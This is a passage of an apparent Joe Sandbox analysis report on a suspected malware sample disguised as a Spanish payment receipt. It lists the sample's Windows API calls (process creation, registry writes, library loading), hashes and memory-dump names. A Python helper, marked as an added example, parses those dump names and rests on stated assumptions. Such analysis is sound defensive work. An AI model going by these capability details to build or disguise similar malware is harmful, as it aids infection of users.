• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
• Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
• Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
• Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
• Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
• Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
• Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
• Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
• Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
• Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45
APIs
• GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
  • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
  • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
  • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
  • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
  • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
  • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
  • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
• FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
• String ID:
• API String ID: 334405425-0
• Opcode ID: 11c3cf00bd93389db0dc410ebbe218bf6d9da3e13992e2678f31c330316c266a
• Instruction ID: 94cae06f4fc191ca30d479cf411a95ccd627b95a6d871bbe988cbf7c6203fea7
• Opcode Fuzzy Hash: 11c3cf00bd93389db0dc410ebbe218bf6d9da3e13992e2678f31c330316c266a
• Instruction Fuzzy Hash: 0D21F231904104FBCF11AFA5CF48A9E7A71BF48354F20013BF501B91E0DBBD8A92965D
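Every function record above cites the same set of memory dumps, and the dump file names encode where in the process each region sat. The helper below is an added example, not part of the Joe Sandbox report or its tooling: it parses the sdmp names listed on this page and maps each region back onto the PE image whose "Offset" is 00400000. The field layout is an assumption inferred from the values on this page: the fourth field is taken as the region base, the fifth as the Windows page protection (0x20 on the region at image base + 0x1000, 0x02 on the PE header at the image base, 0x04 on the later data regions, which matches winnt.h) and the seventh as the region type (0x01000000 = MEM_IMAGE, consistent with "based on PE: true"). The sixth and eighth fields are kept raw and not interpreted.

```python
"""Parse Joe Sandbox *.sdmp dump names and relate them to the PE image layout.

Added example; the field meanings below are inferred from the values on the
report page, not taken from Joe Sandbox documentation.
"""
import re
from dataclasses import dataclass

# Page protection and region type constants from winnt.h (fixed Windows values).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: proc.snapshot.dumpid.base.protection.field6.type.field8.sdmp
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    snapshot: int
    dump_id: str        # opaque; not interpreted
    base: int
    protection: int     # assumed: Windows page protection
    field6: str         # raw; meaning not inferred
    region_type: int    # assumed: MEM_IMAGE / MEM_MAPPED / MEM_PRIVATE
    field8: str         # raw; meaning not inferred

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection & 0xFF, hex(self.protection))

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.region_type, hex(self.region_type))

    @property
    def executable(self) -> bool:
        return bool(self.protection & PAGE_EXECUTE_MASK)


def parse_sdmp(name: str) -> DumpRegion:
    """Split one dump file name into its fields; raise on anything else."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised sdmp name: {name!r}")
    proc, snap, dump_id, base, prot, f6, typ, f8 = m.groups()
    return DumpRegion(int(proc, 16), int(snap, 16), dump_id, int(base, 16),
                      int(prot, 16), f6, int(typ, 16), f8)


def image_layout(names, image_base: int):
    """Deduplicate the names (the report repeats them per function), parse them,
    and return rows of (rva, base, protection, type, executable) sorted by address."""
    regions = sorted({parse_sdmp(n) for n in names}, key=lambda r: r.base)
    return [(r.base - image_base, r.base, r.protection_name, r.type_name, r.executable)
            for r in regions]


def executable_regions(names, image_base: int):
    """Only the regions the disassembly above could have come from."""
    return [row for row in image_layout(names, image_base) if row[4]]


# Dump names as listed in the report (the "Source File" plus the "Associated" set).
PAGE_DUMPS = [
    "00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp",
]
IMAGE_BASE = 0x400000  # the "Offset: 00400000" stated in each Memory Dump Source block

if __name__ == "__main__":
    for rva, base, prot, typ, is_exec in image_layout(PAGE_DUMPS, IMAGE_BASE):
        print(f"rva=0x{rva:06X} base=0x{base:08X} {prot:<22} {typ:<11} exec={is_exec}")
```

Run against the page's own names, the only executable region is the one at RVA 0x1000 (base 0x401000, PAGE_EXECUTE_READ), which is exactly the "Source File" every function record cites; the header at RVA 0 and the region at 0x454000 are read-only and the regions from 0x40A000 to 0x450000 are read-write data. If a later record ever cited a dump whose type is MEM_PRIVATE with an execute bit set, that would be the injected-code region the signatures in the report overview describe, and this layout check is the quick way to spot it.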
APIs
• GlobalFree.KERNEL32(00000000), ref: 00401C0B
• GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
  • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
  • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$AllocFreelstrcatlstrlen
                                                                                                                                                                                    • String ID: ExecToStack
                                                                                                                                                                                    • API String ID: 3292104215-166031814
                                                                                                                                                                                    • Opcode ID: 3068f9b91c3f4162d0930761ac5c94cf9212319f1563e24b4ffc4f3e6270dea2
                                                                                                                                                                                    • Instruction ID: e925a152a6e0f7021576dd296752ea90fe74f89098b2d6bde03e837448aacd47
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3068f9b91c3f4162d0930761ac5c94cf9212319f1563e24b4ffc4f3e6270dea2
                                                                                                                                                                                    • Instruction Fuzzy Hash: BA213673904210EBD720AFA4DEC5E5E72A4EB08328715093BF552B72D1D6BCE8518B5D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402515
                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseValuelstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2655323295-0
                                                                                                                                                                                    • Opcode ID: 115faf02d334c89f827882088b0be8a93b9cbe5759b9d35681ab44e4bb566471
                                                                                                                                                                                    • Instruction ID: 742bbefa47e989f243bf6062c522ac596cbc11b4bfeba2949f21d1d9b27b1258
                                                                                                                                                                                    • Opcode Fuzzy Hash: 115faf02d334c89f827882088b0be8a93b9cbe5759b9d35681ab44e4bb566471
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B11AC71E00108BEEB10AFA1DE49EAEBAB8FF44358F10403AF404B61C1D7B88D409A68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Enum$CloseValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 397863658-0
                                                                                                                                                                                    • Opcode ID: eb6c8e15ee44575ea420681c9cc2a7e67ba876646878e1eb00c8e7fc00d42c1f
                                                                                                                                                                                    • Instruction ID: 8c40f98af4add78d59c4bc2bb7842a1dfdaddd4ec6c9bbdee1c196b88a33675a
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb6c8e15ee44575ea420681c9cc2a7e67ba876646878e1eb00c8e7fc00d42c1f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 61017CB1A04105BBEB159F94DE58AAFB66CEF40348F10403AF501B61D0EBB85E45966D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3356406503-0
                                                                                                                                                                                    • Opcode ID: 06d9a8ad9cd75b344e281f0f33afa87d54a5442f7653d28a97a29c4d8ae17323
                                                                                                                                                                                    • Instruction ID: f1f7847c69b95e8b88bdf62be751073741875666d26e4aee14b76084b72d5d95
                                                                                                                                                                                    • Opcode Fuzzy Hash: 06d9a8ad9cd75b344e281f0f33afa87d54a5442f7653d28a97a29c4d8ae17323
                                                                                                                                                                                    • Instruction Fuzzy Hash: E2116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
• Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
• Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
• Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C
APIs
• OleInitialize.OLE32(00000000), ref: 0040564C
  • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
• CoUninitialize.COMBASE(00000404,00000000,?,00000000,?), ref: 00405698
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: InitializeMessageSendUninitialize
• String ID:
• API String ID: 2896919175-0
• Opcode ID: a1e7d01539343cbedca50b7a5125379b8eaabd142d8c7e4c73993699b28e4919
• Instruction ID: e8a19e3ae465cdfca2bef1253819f9a2a21047bc58a71dd1e8c92fd5a8ca6894
• Opcode Fuzzy Hash: a1e7d01539343cbedca50b7a5125379b8eaabd142d8c7e4c73993699b28e4919
• Instruction Fuzzy Hash: EFF0F0B2600600DBE3115754A901B677364EB80304F85497AEF88623E1CB3B0C128A2E
APIs
• ShowWindow.USER32(00000000,00000000), ref: 00401EFC
• EnableWindow.USER32(00000000,00000000), ref: 00401F07
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: Window$EnableShow
• String ID:
• API String ID: 1136574915-0
• Opcode ID: d503c9f13438e3c869f1bbfba4ca0b9980fccaccea62ec0994004058657006bf
• Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
• Opcode Fuzzy Hash: d503c9f13438e3c869f1bbfba4ca0b9980fccaccea62ec0994004058657006bf
• Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D
APIs
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
• CloseHandle.KERNEL32(?), ref: 00405B20
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
